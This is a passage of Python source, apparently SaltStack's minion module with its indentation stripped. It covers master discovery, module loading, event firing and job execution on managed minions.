self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting {0} time{1} to discover masters'.format(att, (att > 1 and 's' or '')))
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: {0}'.format(err))
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "{0}". '
'Should be "any" or "all"'.format(policy))
else:
mapping = self.opts['discovery'].get('mapping', {})
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if policy == 'any' and bool(cnt) or cnt == len(mapping):
self.opts['master'] = proto_data['master']
return
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
# future lint: disable=str-format-in-logging
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
# future lint: enable=str-format-in-logging
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
self.opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts, proxy=proxy)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions, proxy=proxy)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func' in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=True)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
